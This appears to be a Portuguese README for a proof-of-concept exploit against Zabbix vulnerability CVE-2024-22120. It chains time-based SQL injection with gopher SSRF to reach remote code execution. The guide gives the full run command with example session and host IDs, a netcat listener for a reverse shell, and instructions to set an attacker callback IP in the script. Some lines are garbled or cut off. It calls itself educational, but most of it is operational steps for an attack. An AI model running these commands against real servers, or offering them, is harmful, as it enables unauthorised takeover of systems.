
Exploit de prova de conceito para CVE-2024-22120 que utiliza injeção SQL baseada em tempo e SSRF baseado em gopher para obter execução remota de código em servidores Zabbix vulneráveis, destinado a pesquisa educacional de segurança.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Você identificou um servidor Zabbix rodando no IP 192.168.1.100 e tem acesso a um usuário de privilégios baixos com os seguintes detalhes:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gVocê deseja explorar a vulnerabilidade de RCE usando este script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: O endereço IP do servidor Zabbix.--sid d82bf6715e1d3c1f25: O ID da sessão de um usuário de privilégios baixos.--hostid 10107: O ID de um host que o usuário de privilégios baixos pode acessar.--phpsessid a4g7f48d9j3r7h8s9g: O ID da sessão PHP usado para autenticar requisições.--false_time 1: Tempo em segundos para aguardar em caso de suposição incorreta durante a injeção de SQL (o padrão é 1 segundo).--true_time 3: Tempo em segundos para aguardar em caso de suposição correta durante a injeção de SQL (o padrão é 3 segundos).10.0.46.27:5555 no script).Certifique-se de que sua máquina esteja ouvindo na porta especificada (5555 no script) para receber o reverse shell. Você pode usar netcat para isso:
nc -lvnp 5555
Substitua o IP 10.0.46.27 e a porta 5555 na função CreateScript pelo seu próprio IP e porta desejada para receber o reverse shell.